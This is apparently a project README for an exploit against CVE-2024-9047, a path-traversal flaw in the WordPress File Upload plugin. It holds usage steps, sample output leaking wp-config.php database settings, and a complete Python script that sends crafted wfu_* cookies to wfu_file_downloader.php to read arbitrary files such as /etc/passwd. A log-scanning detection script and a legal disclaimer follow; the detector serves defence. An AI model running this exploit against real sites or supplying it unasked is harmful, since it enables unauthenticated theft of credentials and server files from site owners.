This project provides an exploit script for a critical security vulnerability in the WordPress File Upload plugin. The vulnerability (CVE-2024-9047) affects all versions of the plugin up to and including 4.24.11 and allows an unauthenticated attacker to read or delete arbitrary files on the server (for example wp-config.php) via path traversal.

Requirement: Python with the requests library. Clone or download the project code to your machine:
git clone
cd CVE-2024-9047-Exploit
Install the Python dependency (if requests is not already installed):
pip install requests
python CVE-2024-9047.py --url <target WordPress site URL> [--command <target file path>]
--url, -u: required. Root URL of the target WordPress site (e.g. ).
--command, -c: optional. Path of the file to read, relative to the server's filesystem root. Defaults to /../../../../../opt/lampp/htdocs/wordpress/wp-config.php.

Run with only the target URL to read the default file:
python CVE-2024-9047.py -u
The tool detects the plugin version automatically; if the version is ≤ 4.24.11 and the PHP environment meets the requirement (the script's own description names PHP 7.4 or earlier), it attempts to read the default wp-config.php file.
To read a different file, pass its path with --command (here /etc/passwd):
python CVE-2024-9047.py -u --command /../../../../../etc/passwd

Sample output of a successful run (here reading wp-config.php):
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
...
The script sends a POST request to <target>/wp-content/plugins/wp-file-upload/wfu_file_downloader.php carrying crafted cookies and form data, and uses path traversal to read the target file. The full script:

import argparse

import requests

PLUGIN_PATH = "/wp-content/plugins/wp-file-upload"
LAST_VULNERABLE = "4.24.11"


def version_tuple(version):
    # Compare versions numerically: "4.3" must sort below "4.24.11", which the plain
    # string comparison in the original listing got wrong. A non-numeric tag such as
    # "trunk" yields an empty tuple and therefore compares as in range; treat that
    # result as "needs manual confirmation" rather than a definite answer.
    return tuple(int(part) for part in version.strip('"').split(".") if part.isdigit())


def check_version(url):
    """Read the plugin's public readme.txt and report whether its 'Stable tag' is <= 4.24.11."""
    try:
        # The request itself was missing from the original listing; readme.txt is the
        # file in which a WordPress plugin publishes its 'Stable tag' (assumed location).
        response = requests.get(f"{url}{PLUGIN_PATH}/readme.txt", timeout=10)
        if response.status_code == 200 and "Stable tag" in response.text:
            for line in response.text.splitlines():
                if "Stable tag" in line:
                    version = line.split(":")[1].strip()
                    print(f"Detected version: {version}")
                    if version_tuple(version) <= version_tuple(LAST_VULNERABLE):
                        print("The site is vulnerable!")
                        return True
                    print("The site is not vulnerable.")
                    return False
        print("Unable to detect the plugin version.")
        return False
    except requests.RequestException as e:
        print(f"Error checking version: {e}")
        return False


def exploit(url, command):
    """Send the POST request described above and print the server's response."""
    try:
        exploit_url = f"{url}{PLUGIN_PATH}/wfu_file_downloader.php"
        cookies = {
            "wp_wpfileupload_testupload": "Nxploited",
            "wfu_storage_file123": command,
            "wfu_download_ticket_ticket123": "9876543210987",
            "wfu_ABSPATH": "/",
        }
        data = {
            "file": "file123",
            "ticket": "ticket123",
            "handler": "dboption",
            "session_legacy": "1",
            "dboption_base": "cookies",
            "dboption_useold": "0",
            "wfu_cookie": "wp_wpfileupload_testupload",
        }
        response = requests.post(exploit_url, cookies=cookies, data=data, timeout=10)
        if response.status_code == 200:
            print("Exploit successful! Response:")
            print(response.text)
        else:
            print(f"Exploit failed. Response code: {response.status_code}")
    except requests.RequestException as e:
        print(f"Error during exploitation: {e}")


def main():
    parser = argparse.ArgumentParser(description="The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.")
    parser.add_argument("--url", "-u", required=True, help="Target URL (e.g., )")
    parser.add_argument("--command", "-c", default="/../../../../../opt/lampp/htdocs/wordpress/wp-config.php", help="File path to read")
    args = parser.parse_args()
    target_url = args.url.rstrip("/")
    command = args.command
    if check_version(target_url):
        exploit(target_url, command)


if __name__ == "__main__":
    main()
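A detection-side counterpart, added here as an example and not part of the project: it scans log lines for requests to the wfu_file_downloader.php endpoint whose wfu_* cookies carry a path-traversal step, decoding repeatedly so percent-encoded variants are caught. The log format (client IP, method, path, status, quoted Cookie header) and the sample lines are constructed for the example; a real deployment would adapt LOG_RE to its proxy or WAF log.

```python
import re
from urllib.parse import unquote

# Endpoint named in the script above; exploit requests carry a traversal path in a wfu_* cookie.
ENDPOINT = "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Hypothetical log format: client IP, method, path, status, quoted Cookie header.
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def decode(value):
    """Undo URL encoding until stable, so %252e%252e%252f cannot slip past the check."""
    prev = None
    while value != prev:
        prev, value = value, unquote(value)
    return value


def suspicious_cookies(cookie_header):
    """Return the names of wfu_* cookies whose decoded value contains '..' as a path step."""
    hits = []
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name.startswith("wfu_") and TRAVERSAL.search(decode(value)):
            hits.append(name)
    return hits


def scan(lines):
    """Return (client_ip, cookie_names) for requests to the endpoint that carry traversal cookies."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or decode(m.group(3).split("?")[0]).lower() != ENDPOINT:
            continue
        names = suspicious_cookies(m.group(5))
        if names:
            findings.append((m.group(1), names))
    return findings


# Constructed sample lines (not real traffic); the first two mirror the cookies the script above sets.
SAMPLE_LOG = [
    '203.0.113.5 POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php 200 "wfu_storage_file123=/../../../../../etc/passwd; wfu_ABSPATH=/; wfu_download_ticket_ticket123=9876543210987"',
    '198.51.100.7 POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php 200 "wfu_storage_file9=%2e%2e%2f%2e%2e%2fwp-config.php"',
    '192.0.2.9 GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php 200 "wfu_storage_file1=uploads/report.pdf"',
    '192.0.2.9 GET /wp-login.php 200 "wordpress_test_cookie=WP+Cookie+check"',
]

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG):
        print(f"{ip}: traversal in {', '.join(names)}")
```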
This tool and its documentation are intended solely for security research, education, and authorized penetration testing. Using this tool to attack any system without explicit authorization is illegal, and the user bears all legal responsibility. The project author and contributors accept no liability for any misuse.